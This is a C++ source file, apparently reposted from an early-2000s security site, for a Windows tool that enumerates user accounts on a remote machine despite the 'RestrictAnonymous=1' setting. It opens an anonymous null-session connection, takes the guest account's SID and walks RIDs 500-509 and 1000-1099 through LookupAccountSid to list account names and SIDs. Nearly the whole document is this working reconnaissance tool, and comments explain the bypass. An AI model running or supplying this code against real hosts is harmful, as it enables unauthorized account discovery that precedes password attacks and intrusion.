突破“RestrictAnonymous=1”限制枚举帐号的代码

/ns/wz/comp/data/20020819053049.htm

////////////////////////////////////////////////////////////////////////////////
//
// Enum users
//
// File : Enum.cpp
// Comment : For win2k and XP(pro\server\adv)
//
//
// Created by : Refdom
// Email : refdom@263.net
// Home Page : www.opengram.com
//
// If you modify the code, or add more functions, please email me a copy.
//
////////////////////////////////////////////////////////////////////////////////


#include <stdio.h>
#include <iostream.h>
#include <windows.h>
#include <Lm.h>

#pragma comment (lib, "Advapi32.lib")
#pragma comment (lib, "Netapi32.lib")
#pragma comment (lib, "Mpr.lib")

// Prints a SID in "S-1-..." form followed by its sub-authority count and the
// account type named by *peUse.
void MyPrintSidInfo(PSID pSid, PSID_NAME_USE peUse);

// Connects lpNetResource as lpUserName/lpPassword after cancelling any existing
// connection to lpRemoteName; returns 0 on success, otherwise a Win32 error code.
int MyConnectServer(LPNETRESOURCE lpNetResource, LPCTSTR lpPassword,
                    LPCTSTR lpUserName, DWORD dwFlags, LPTSTR lpRemoteName);

// Cancels the connection to lpName; returns 0 on success, otherwise a Win32 error code.
int MyDisConnectServer(LPCTSTR lpName, DWORD dwFlag, BOOL bForce);

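// Overwrites the last sub-authority of pWorkSid with dwRid, resolves the
// resulting SID on lpSystem and prints the account when it resolves.
//
// pWorkSid     - writable SID whose final sub-authority is the RID slot
// lpUserName / lpDomainName - output buffers, each cchBuf TCHARs long
//
// Returns the LookupAccountSid result.  On FALSE nothing else is called
// afterwards, so the caller may still read GetLastError().
static BOOL LookupRid(LPCTSTR lpSystem, PSID pWorkSid, DWORD dwRid,
                      LPTSTR lpUserName, LPTSTR lpDomainName, DWORD cchBuf)
{
    // LookupAccountSid writes back through both size pointers, so each output
    // buffer gets its own size variable (the original shared one).
    DWORD cchUser = cchBuf;
    DWORD cchDomain = cchBuf;
    SID_NAME_USE eUse = SidTypeUnknown;
    BYTE nSub = *GetSidSubAuthorityCount(pWorkSid);

    if (nSub == 0) {
        SetLastError(ERROR_INVALID_SID);
        return FALSE;
    }
    *GetSidSubAuthority(pWorkSid, nSub - 1) = dwRid;

    if (!LookupAccountSid(lpSystem, pWorkSid, lpUserName, &cchUser,
                          lpDomainName, &cchDomain, &eUse)) {
        return FALSE;
    }
    printf("UserName: %s\n", lpUserName);
    MyPrintSidInfo(pWorkSid, &eUse);
    return TRUE;
}

// Usage: Enum <target>
//
// argv[1] is used both as the remote resource name for the connection and as
// the system name for the account lookups.  Resolves the "guest" account's
// SID, then looks up RIDs 500..509 and 1000..1099 under the same authority.
// Always returns 0; progress and errors are reported on stdout.
int main(int argc, char *argv[])
{
    enum { BUF_SIZE = 1024 };  // bytes for the SID buffer, TCHARs for the name buffers

    // Everything is declared up front so the gotos below never jump over an
    // initialisation (the file is C++).
    int nRetCode;
    int i;
    DWORD cbSid = BUF_SIZE;
    DWORD cchDomain = BUF_SIZE;
    DWORD cbGuestSid;
    PSID pSid = NULL;         // SID of "guest", as returned by LookupAccountName
    PSID pWorkSid = NULL;     // writable copy of pSid; its last sub-authority is rewritten per RID
    LPTSTR lpDomainName = NULL;
    LPTSTR lpUserName = NULL;
    LPTSTR lpTarget;
    SID_NAME_USE eUse = SidTypeUnknown;
    NETRESOURCE NET;

    // The argument count is checked before argv[1] is touched; the original
    // copied argv[1] into fixed 50/30-byte buffers with sprintf first.
    if (argc < 2) {
        return 0;
    }
    lpTarget = argv[1];

    pSid = (PSID)LocalAlloc(LPTR, BUF_SIZE);
    lpDomainName = (LPTSTR)LocalAlloc(LPTR, BUF_SIZE * sizeof(TCHAR));
    lpUserName = (LPTSTR)LocalAlloc(LPTR, BUF_SIZE * sizeof(TCHAR));
    if (pSid == NULL || lpDomainName == NULL || lpUserName == NULL) {
        printf("Out of memory!\n");
        goto Cleanup;
    }

    NET.lpLocalName = NULL;
    NET.lpRemoteName = lpTarget;
    NET.dwType = RESOURCETYPE_ANY;
    NET.lpProvider = NULL;

    printf("Connecting %s...", lpTarget);
    // Empty user name and password: an anonymous ("null session") connection.
    // With RestrictAnonymous=1 the anonymous SAM listing is refused, but the
    // LSA name<->SID lookups used below still answer, which is the gap the file
    // header refers to.  On Windows 2000 RestrictAnonymous=2 closes it (later
    // versions tighten anonymous access further), and the connection shows up
    // on the target as an anonymous logon.
    nRetCode = MyConnectServer(&NET, "", "", 0, lpTarget);
    if (nRetCode) {
        printf("Failed!\n");
        goto Cleanup;
    }
    printf("Successfully!\n");

    // The "guest" SID supplies the identifier authority and all sub-authorities
    // except the last one (the RID), which is varied below.
    if (!LookupAccountName(lpTarget, "guest", pSid, &cbSid,
                           lpDomainName, &cchDomain, &eUse)) {
        printf("Lookup failed!%lu\n", (unsigned long)GetLastError());
        goto End;
    }
    printf("DomainName:%s\n", lpDomainName);
    MyPrintSidInfo(pSid, &eUse);

    // A byte-exact copy of the guest SID is patched in place for each RID.
    // This replaces the AllocateAndInitializeSid/FreeSid pairing, which freed
    // an uninitialised or already-freed pointer on several paths.
    cbGuestSid = GetLengthSid(pSid);
    pWorkSid = (PSID)LocalAlloc(LPTR, cbGuestSid);
    if (pWorkSid == NULL || !CopySid(cbGuestSid, pWorkSid, pSid)) {
        printf("Error SID!%lu\n", (unsigned long)GetLastError());
        goto End;
    }

    // lookup system account: stop at the first RID that does not resolve
    for (i = 0; i < 10; i++) {
        if (!LookupRid(lpTarget, pWorkSid, 500 + i, lpUserName, lpDomainName, BUF_SIZE)) {
            printf("Lookup error!%lu\n", (unsigned long)GetLastError());
            break;
        }
    }

    // look up user account: unresolved RIDs are skipped silently
    for (i = 0; i < 100; i++) {
        (void)LookupRid(lpTarget, pWorkSid, 1000 + i, lpUserName, lpDomainName, BUF_SIZE);
    }

End:
    Sleep(100);  // kept from the original; presumably lets the last lookup settle - confirm
    printf("Disconnecting server...");
    nRetCode = MyDisConnectServer(lpTarget, CONNECT_UPDATE_PROFILE, TRUE);
    if (nRetCode) {
        // the original printed the stale connect result here instead of this one
        printf("Failed!%d\n", nRetCode);
    } else {
        printf("Successfully!\n");
    }

Cleanup:
    // LocalFree(NULL) is a no-op, so the early-exit paths are covered too.
    // Both SIDs came from LocalAlloc, so they are released with LocalFree, not FreeSid.
    LocalFree(pWorkSid);
    LocalFree(pSid);
    LocalFree(lpDomainName);
    LocalFree(lpUserName);
    return 0;
}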

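// Prints a SID in "S-1-<authority>-<sub>-..." form, then its sub-authority
// count and the account type named by *peUse, each on its own indented line.
//
// pSid  - a valid SID
// peUse - the SID_NAME_USE returned by LookupAccountName/LookupAccountSid for it
void MyPrintSidInfo(PSID pSid, PSID_NAME_USE peUse)
{
    PSID_IDENTIFIER_AUTHORITY pSIA = GetSidIdentifierAuthority(pSid);
    int nSubAuthorityCount = *GetSidSubAuthorityCount(pSid);
    int i;

    printf("\tSID:");
    if (pSIA->Value[0] == 0 && pSIA->Value[1] == 0) {
        // Authority fits in 32 bits: print it in decimal.  Each byte is widened
        // to ULONG before shifting; the original shifted the int-promoted byte,
        // which overflows for Value[2] >= 0x80.
        ULONG ulSIA = (ULONG)pSIA->Value[5]
                    | ((ULONG)pSIA->Value[4] << 8)
                    | ((ULONG)pSIA->Value[3] << 16)
                    | ((ULONG)pSIA->Value[2] << 24);
        printf("S-1-%lu", ulSIA);
    } else {
        // 48-bit authority: hexadecimal with a 0x prefix and every byte
        // zero-padded, so the six bytes cannot run together ambiguously.
        printf("S-1-0x%02X%02X%02X%02X%02X%02X",
               (unsigned)pSIA->Value[0], (unsigned)pSIA->Value[1],
               (unsigned)pSIA->Value[2], (unsigned)pSIA->Value[3],
               (unsigned)pSIA->Value[4], (unsigned)pSIA->Value[5]);
    }

    for (i = 0; i < nSubAuthorityCount; i++) {
        printf("-%lu", (unsigned long)*GetSidSubAuthority(pSid, i));
    }

    printf("\n\tSubAuthorityCount:%d\n", nSubAuthorityCount);
    printf("\tAccountType:");
    switch (*peUse) {
    case SidTypeUser:
        printf("User");
        break;
    case SidTypeGroup:
        printf("Group account");
        break;
    case SidTypeDomain:
        printf("Domain account");
        break;
    case SidTypeAlias:
        printf("Alias account");
        break;
    case SidTypeWellKnownGroup:
        printf("Well-known group");
        break;
    case SidTypeDeletedAccount:
        printf("Deleted account");
        break;
    case SidTypeInvalid:
        printf("Invalid account");
        break;
    case SidTypeUnknown:
        printf("Unknown account");
        break;
    case SidTypeComputer:
        printf("Computer account");
        break;
    default:
        // enum values this build does not know about were printed as nothing
        printf("Unknown type (%d)", (int)*peUse);
        break;
    }
    printf("\n");
}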

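// Connects lpNetResource with the given credentials after cancelling any
// existing connection to lpRemoteName.
//
// Returns 0 on success, otherwise the Win32 error code reported by
// WNetAddConnection2.  The original returned GetLastError() on every failure
// path; that value is not guaranteed to be set by this API, and when it was 0
// a failed connect was reported to the caller as success.
int MyConnectServer(LPNETRESOURCE lpNetResource,
                    LPCTSTR lpPassword,
                    LPCTSTR lpUserName,
                    DWORD dwFlags,
                    LPTSTR lpRemoteName)
{
    DWORD dwRetCode;

    // cancel the connect first; failing here is normal when nothing was
    // connected, so the result is deliberately ignored
    (void)WNetCancelConnection2(lpRemoteName, dwFlags, TRUE);

    // connect remote server
    dwRetCode = WNetAddConnection2(lpNetResource, lpPassword, lpUserName, dwFlags);
    if (dwRetCode == NO_ERROR) {
        return 0;
    }
    return (int)dwRetCode;
}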

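// Cancels the connection to lpName.
//
// Returns 0 on success, otherwise the Win32 error code reported by
// WNetCancelConnection2 itself rather than GetLastError(), which this API
// does not promise to set and which could be 0 after a genuine failure.
int MyDisConnectServer(LPCTSTR lpName,
                       DWORD dwFlag,
                       BOOL bForce)
{
    DWORD dwRetCode = WNetCancelConnection2(lpName, dwFlag, bForce);

    if (dwRetCode == NO_ERROR) {
        return 0;
    }
    return (int)dwRetCode;
}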